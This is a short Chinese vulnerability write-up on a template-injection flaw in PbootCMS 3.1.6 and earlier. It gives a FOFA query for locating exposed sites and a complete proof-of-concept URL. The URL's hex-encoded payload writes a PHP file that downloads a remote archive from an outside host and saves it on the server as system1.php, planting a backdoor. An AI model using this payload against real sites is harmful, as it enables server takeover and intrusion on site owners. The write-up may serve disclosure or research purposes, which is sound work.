PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统，是一套高效、简洁、 强悍的可免费商用的PHP CMS源码，能够满足各类企业网站开发建设的需要。

漏洞概述

PbootCMS v<=3.1.6版本中存在模板注入，攻击者可构造特定的链接利用该漏洞，执行任意代码，写入后门，获取服务器权限，进而控制整个web服务器。

复现环境

FOFA：app="PbootCMS-PHP网站开发管理系统"

漏洞复现

PoC-1

/?member/login/klmns}{pboot:if(1);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/klmj0;use/**/function/**/get/**/as/**/klmj99;use/**/function/**/hex2bin/**/as/**/klmj66;test(klmj0(klmj99(‘ll‘),‘w‘),klmj66(klmj99(‘txt‘)));if(2)}{/pboot:if}&ll＝.xsZml.php&txt＝3C3F7068700A2461203D2022636F7079223B0A24612822687474703A2F2F7777772E677A2D6C7879792E636F6D2F7374617469632F6164646F6E732F6769742E7A6970222C2273797374656D312E70687022293B0A6563686F20276F6B313233273B